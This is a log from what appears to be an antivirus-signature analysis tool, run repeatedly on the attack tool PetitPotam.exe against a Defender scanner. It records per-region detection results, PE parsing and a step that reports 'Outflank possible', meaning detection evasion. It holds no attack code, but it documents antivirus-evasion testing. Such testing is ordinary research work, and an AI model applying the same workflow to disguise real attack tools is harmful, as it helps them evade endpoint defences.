  Idx: 85  result: ScanResult.NOT_DETECTED
  Idx: 84  result: ScanResult.NOT_DETECTED
  Idx: 83  result: ScanResult.NOT_DETECTED
  Idx: 82  result: ScanResult.NOT_DETECTED
  Idx: 81  result: ScanResult.NOT_DETECTED
  Idx: 80  result: ScanResult.NOT_DETECTED
  Idx: 79  result: ScanResult.NOT_DETECTED
  Idx: 78  result: ScanResult.NOT_DETECTED
  Idx: 77  result: ScanResult.NOT_DETECTED
  Idx: 76  result: ScanResult.NOT_DETECTED
  Idx: 75  result: ScanResult.NOT_DETECTED
  Idx: 74  result: ScanResult.NOT_DETECTED
  Idx: 73  result: ScanResult.NOT_DETECTED
  Idx: 72  result: ScanResult.NOT_DETECTED
  Idx: 71  result: ScanResult.NOT_DETECTED
  Idx: 70  result: ScanResult.NOT_DETECTED
  Idx: 69  result: ScanResult.NOT_DETECTED
  Idx: 68  result: ScanResult.NOT_DETECTED
  Idx: 67  result: ScanResult.NOT_DETECTED
  Idx: 66  result: ScanResult.NOT_DETECTED
  Idx: 65  result: ScanResult.NOT_DETECTED
  Idx: 64  result: ScanResult.NOT_DETECTED
  Idx: 63  result: ScanResult.NOT_DETECTED
  Idx: 62  result: ScanResult.NOT_DETECTED
  Idx: 61  result: ScanResult.NOT_DETECTED
  Idx: 60  result: ScanResult.NOT_DETECTED
  Idx: 59  result: ScanResult.NOT_DETECTED
  Idx: 58  result: ScanResult.NOT_DETECTED
  Idx: 57  result: ScanResult.NOT_DETECTED
  Idx: 56  result: ScanResult.NOT_DETECTED
  Idx: 55  result: ScanResult.NOT_DETECTED
  Idx: 54  result: ScanResult.NOT_DETECTED
  Idx: 53  result: ScanResult.NOT_DETECTED
  Idx: 52  result: ScanResult.NOT_DETECTED
  Idx: 51  result: ScanResult.NOT_DETECTED
  Idx: 50  result: ScanResult.NOT_DETECTED
  Idx: 49  result: ScanResult.NOT_DETECTED
  Idx: 48  result: ScanResult.NOT_DETECTED
  Idx: 47  result: ScanResult.NOT_DETECTED
  Idx: 46  result: ScanResult.NOT_DETECTED
  Idx: 45  result: ScanResult.NOT_DETECTED
  Idx: 44  result: ScanResult.NOT_DETECTED
  Idx: 43  result: ScanResult.NOT_DETECTED
  Idx: 42  result: ScanResult.NOT_DETECTED
  Idx: 41  result: ScanResult.NOT_DETECTED
  Idx: 40  result: ScanResult.NOT_DETECTED
  Idx: 39  result: ScanResult.NOT_DETECTED
  Idx: 38  result: ScanResult.NOT_DETECTED
  Idx: 37  result: ScanResult.NOT_DETECTED
  Idx: 36  result: ScanResult.NOT_DETECTED
  Idx: 35  result: ScanResult.NOT_DETECTED
  Idx: 34  result: ScanResult.NOT_DETECTED
  Idx: 33  result: ScanResult.NOT_DETECTED
  Idx: 32  result: ScanResult.NOT_DETECTED
  Idx: 31  result: ScanResult.NOT_DETECTED
  Idx: 30  result: ScanResult.NOT_DETECTED
  Idx: 29  result: ScanResult.NOT_DETECTED
  Idx: 28  result: ScanResult.NOT_DETECTED
  Idx: 27  result: ScanResult.NOT_DETECTED
  Idx: 26  result: ScanResult.NOT_DETECTED
  Idx: 25  result: ScanResult.NOT_DETECTED
  Idx: 24  result: ScanResult.NOT_DETECTED
  Idx: 23  result: ScanResult.NOT_DETECTED
  Idx: 22  result: ScanResult.NOT_DETECTED
  Idx: 21  result: ScanResult.NOT_DETECTED
  Idx: 20  result: ScanResult.NOT_DETECTED
  Idx: 19  result: ScanResult.NOT_DETECTED
  Idx: 18  result: ScanResult.NOT_DETECTED
  Idx: 17  result: ScanResult.NOT_DETECTED
  Idx: 16  result: ScanResult.NOT_DETECTED
  Idx: 15  result: ScanResult.NOT_DETECTED
  Idx: 14  result: ScanResult.NOT_DETECTED
  Idx: 13  result: ScanResult.NOT_DETECTED
  Idx: 12  result: ScanResult.NOT_DETECTED
  Idx: 11  result: ScanResult.NOT_DETECTED
  Idx: 10  result: ScanResult.NOT_DETECTED
  Idx: 9  result: ScanResult.NOT_DETECTED
  Idx: 8  result: ScanResult.NOT_DETECTED
  Idx: 7  result: ScanResult.NOT_DETECTED
  Idx: 6  result: ScanResult.NOT_DETECTED
  Idx: 5  result: ScanResult.NOT_DETECTED
  Idx: 4  result: ScanResult.NOT_DETECTED
  Idx: 3  result: ScanResult.NOT_DETECTED
  Idx: 2  result: ScanResult.NOT_DETECTED
  Idx: 1  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED

[INFO    ][2023-07-21 13:41:04,776] runVerifications() :: Verification run: 7 MIDDLE8 ALL
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  Idx: 0  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  Idx: 0  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED

[INFO    ][2023-07-21 13:41:05,439] runVerifications() :: Verification run: 8 THIRDS4 ALL
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  Idx: 0  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  Idx: 0  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED

[INFO    ][2023-07-21 13:41:05,444] runVerifications() :: Verification run: 9 FULL ALL
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 0  result: ScanResult.NOT_DETECTED

[INFO    ][2023-07-21 13:41:05,444] saveToFile() :: Saving results to: app/upload/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-07-21 13:41:05,445] augmentFile() :: Perform augmentation of matches
[INFO    ][2023-07-21 13:41:07,759] saveToFile() :: Saving results to: app/upload/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-07-21 13:41:07,776] outflankFile() :: Attempt to outflank the file
[WARNING ][2023-07-21 13:41:26,630] outflankPe() :: Outflank possible
[INFO    ][2023-07-21 13:41:26,630] saveToFile() :: Saving results to: app/upload/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-07-21 13:41:26,645] save() :: Saving HashCache (51862)
[INFO    ][2023-08-04 18:31:19,198] main() :: Using file: app/upload/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-08-04 18:31:19,198] handleFile() :: Handle file: app/upload/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-08-04 18:31:19,199] handleFile() :: Using parser for file type EXE
[WARNING ][2023-08-04 18:31:19,246] handleFile() :: Using scanner as defined in outcome: defender
[INFO    ][2023-08-04 18:31:19,246] load() :: Loading HashCache
[INFO    ][2023-08-04 18:31:19,346] load() ::   77569 hashes loaded
[INFO    ][2023-08-04 18:31:19,346] save() :: Saving HashCache (77569)
[INFO    ][2023-08-04 18:31:19,424] augmentFile() :: Perform augmentation of matches
[INFO    ][2023-08-04 18:31:21,730] saveToFile() :: Saving results to: app/upload/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-08-04 18:31:21,746] save() :: Saving HashCache (77569)
[INFO    ][2023-08-06 16:57:59,768] main() :: Using file: app/upload/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-08-06 16:57:59,768] handleFile() :: Handle file: app/upload/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-08-06 16:57:59,769] handleFile() :: Using parser for file type EXE
[WARNING ][2023-08-06 16:57:59,816] handleFile() :: Using scanner as defined in outcome: defender
[INFO    ][2023-08-06 16:57:59,816] load() :: Loading HashCache
[INFO    ][2023-08-06 16:57:59,918] load() ::   77569 hashes loaded
[INFO    ][2023-08-06 16:57:59,918] save() :: Saving HashCache (77569)
[INFO    ][2023-08-06 16:58:00,000] augmentFile() :: Perform augmentation of matches
[INFO    ][2023-08-06 16:58:02,296] saveToFile() :: Saving results to: app/upload/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-08-06 16:58:02,312] save() :: Saving HashCache (77569)
[INFO    ][2023-08-06 17:32:10,931] main() :: Using file: app/upload/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-08-06 17:32:10,931] handleFile() :: Handle file: app/upload/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-08-06 17:32:10,932] handleFile() :: Using parser for file type EXE
[WARNING ][2023-08-06 17:32:10,980] handleFile() :: Using scanner as defined in outcome: defender
[INFO    ][2023-08-06 17:32:10,980] load() :: Loading HashCache
[INFO    ][2023-08-06 17:32:11,082] load() ::   77569 hashes loaded
[INFO    ][2023-08-06 17:32:11,082] save() :: Saving HashCache (77569)
[INFO    ][2023-08-06 17:32:11,160] augmentFile() :: Perform augmentation of matches
[INFO    ][2023-08-06 17:32:13,439] saveToFile() :: Saving results to: app/upload/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-08-06 17:32:13,454] save() :: Saving HashCache (77569)
[INFO    ][2023-09-01 05:26:59,741] main() :: Using file: app/examples/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-09-01 05:26:59,741] handleFile() :: Handle file: app/examples/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-09-01 05:26:59,750] handleFile() :: Using parser for file type EXE
[WARNING ][2023-09-01 05:26:59,797] handleFile() :: Using scanner as defined in outcome: defender
[INFO    ][2023-09-01 05:26:59,798] saveToFile() :: Saving results to: app/examples/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-09-01 05:26:59,814] load() :: Loading HashCache
[INFO    ][2023-09-01 05:26:59,943] load() ::   85943 hashes loaded
[INFO    ][2023-09-01 05:26:59,943] save() :: Saving HashCache (85943)
[INFO    ][2023-09-01 05:27:00,029] save() :: Saving HashCache (85943)
[INFO    ][2023-09-24 19:22:35,632] main() :: Using file: app/examples/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-09-24 19:22:35,632] handleFile() :: Handle file: app/examples/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-09-24 19:22:35,641] handleFile() :: Using parser for file type EXE
[INFO    ][2023-09-24 19:22:35,641] parseFile() :: FilePe: Parse File
[INFO    ][2023-09-24 19:22:35,671] parsePeSections() :: FilePe: Parse PE Sections
[INFO    ][2023-09-24 19:22:35,671] parsePeRegions() :: FilePe: Parse PE Regions
[WARNING ][2023-09-24 19:22:35,672] parsePeRegions() :: Data Directory Section 0 has address 0, skipping
[WARNING ][2023-09-24 19:22:35,672] parsePeRegions() :: Data Directory Section 3 has address 0, skipping
[WARNING ][2023-09-24 19:22:35,672] parsePeRegions() :: Data Directory Section 4 has address 0, skipping
[WARNING ][2023-09-24 19:22:35,672] parsePeRegions() :: Data Directory Section 7 has address 0, skipping
[WARNING ][2023-09-24 19:22:35,672] parsePeRegions() :: Data Directory Section 8 has address 0, skipping
[WARNING ][2023-09-24 19:22:35,672] parsePeRegions() :: Data Directory Section 9 has address 0, skipping
[WARNING ][2023-09-24 19:22:35,672] parsePeRegions() :: Data Directory Section 11 has address 0, skipping
[WARNING ][2023-09-24 19:22:35,672] parsePeRegions() :: Data Directory Section 13 has address 0, skipping
[WARNING ][2023-09-24 19:22:35,672] parsePeRegions() :: Data Directory Section 14 has address 0, skipping
[WARNING ][2023-09-24 19:22:35,672] parsePeRegions() :: Data Directory Section 15 has address 0, skipping
[WARNING ][2023-09-24 19:22:35,687] handleFile() :: Using scanner as defined in outcome: defender
[INFO    ][2023-09-24 19:22:35,688] saveToFile() :: Saving results to: app/examples/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-09-24 19:22:35,703] load() :: Loading HashCache
[INFO    ][2023-09-24 19:22:35,842] load() ::   101712 hashes loaded
[INFO    ][2023-09-24 19:22:35,842] save() :: Saving HashCache (101712)
[INFO    ][2023-09-24 19:22:35,936] augmentFile() :: Perform augmentation of matches
[INFO    ][2023-09-24 19:22:35,936] augmentFilePe() :: Augment: File PE
[INFO    ][2023-09-24 19:22:36,109] augmentFilePe() :: R2: Analyze
[INFO    ][2023-09-24 19:22:37,346] init() :: R2: Get all strings
[INFO    ][2023-09-24 19:22:37,362] augmentFilePe() :: Augment: Matches
[INFO    ][2023-09-24 19:22:38,233] saveToFile() :: Saving results to: app/examples/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-09-24 19:22:38,248] save() :: Saving HashCache (101712)
[INFO    ][2023-09-25 18:15:53,850] main() :: Using file: app/examples/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-09-25 18:15:53,851] handleFile() :: Handle file: app/examples/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-09-25 18:15:53,851] handleFile() :: Using parser for file type EXE
[INFO    ][2023-09-25 18:15:53,852] parseFile() :: FilePe: Parse File
[INFO    ][2023-09-25 18:15:53,870] parsePeSections() :: FilePe: Parse PE Sections
[INFO    ][2023-09-25 18:15:53,870] parsePeRegions() :: FilePe: Parse PE Regions
[WARNING ][2023-09-25 18:15:53,870] parsePeRegions() :: Data Directory Section 0 has address 0, skipping
[WARNING ][2023-09-25 18:15:53,870] parsePeRegions() :: Data Directory Section 3 has address 0, skipping
[WARNING ][2023-09-25 18:15:53,870] parsePeRegions() :: Data Directory Section 4 has address 0, skipping
[WARNING ][2023-09-25 18:15:53,870] parsePeRegions() :: Data Directory Section 7 has address 0, skipping
[WARNING ][2023-09-25 18:15:53,870] parsePeRegions() :: Data Directory Section 8 has address 0, skipping
[WARNING ][2023-09-25 18:15:53,870] parsePeRegions() :: Data Directory Section 9 has address 0, skipping
[WARNING ][2023-09-25 18:15:53,870] parsePeRegions() :: Data Directory Section 11 has address 0, skipping
[WARNING ][2023-09-25 18:15:53,870] parsePeRegions() :: Data Directory Section 13 has address 0, skipping
[WARNING ][2023-09-25 18:15:53,870] parsePeRegions() :: Data Directory Section 14 has address 0, skipping
[WARNING ][2023-09-25 18:15:53,870] parsePeRegions() :: Data Directory Section 15 has address 0, skipping
[WARNING ][2023-09-25 18:15:53,893] handleFile() :: Using scanner as defined in outcome: defender
[INFO    ][2023-09-25 18:15:53,894] saveToFile() :: Saving results to: app/examples/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-09-25 18:15:53,910] load() :: Loading HashCache
[INFO    ][2023-09-25 18:15:54,046] load() ::   101712 hashes loaded
[INFO    ][2023-09-25 18:15:54,046] save() :: Saving HashCache (101712)
[INFO    ][2023-09-25 18:15:54,143] augmentFile() :: Perform augmentation of matches
[INFO    ][2023-09-25 18:15:54,144] augmentFilePe() :: Augment: File PE
[INFO    ][2023-09-25 18:15:54,304] augmentFilePe() :: R2: Analyze
[INFO    ][2023-09-25 18:15:55,544] init() :: R2: Get all strings
[INFO    ][2023-09-25 18:15:55,559] augmentFilePe() :: Augment: Matches
[INFO    ][2023-09-25 18:15:56,418] saveToFile() :: Saving results to: app/examples/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-09-25 18:15:56,434] save() :: Saving HashCache (101712)
[INFO    ][2023-09-25 18:22:55,385] main() :: Using file: app/examples/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-09-25 18:22:55,385] handleFile() :: Handle file: app/examples/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-09-25 18:22:55,386] handleFile() :: Using parser for file type EXE
[INFO    ][2023-09-25 18:22:55,386] parseFile() :: FilePe: Parse File
[INFO    ][2023-09-25 18:22:55,403] parsePeSections() :: FilePe: Parse PE Sections
[INFO    ][2023-09-25 18:22:55,403] parsePeRegions() :: FilePe: Parse PE Regions
[WARNING ][2023-09-25 18:22:55,404] parsePeRegions() :: Data Directory Section 0 has address 0, skipping
[WARNING ][2023-09-25 18:22:55,404] parsePeRegions() :: Data Directory Section 3 has address 0, skipping
[WARNING ][2023-09-25 18:22:55,404] parsePeRegions() :: Data Directory Section 4 has address 0, skipping
[WARNING ][2023-09-25 18:22:55,404] parsePeRegions() :: Data Directory Section 7 has address 0, skipping
[WARNING ][2023-09-25 18:22:55,404] parsePeRegions() :: Data Directory Section 8 has address 0, skipping
[WARNING ][2023-09-25 18:22:55,404] parsePeRegions() :: Data Directory Section 9 has address 0, skipping
[WARNING ][2023-09-25 18:22:55,404] parsePeRegions() :: Data Directory Section 11 has address 0, skipping
[WARNING ][2023-09-25 18:22:55,404] parsePeRegions() :: Data Directory Section 13 has address 0, skipping
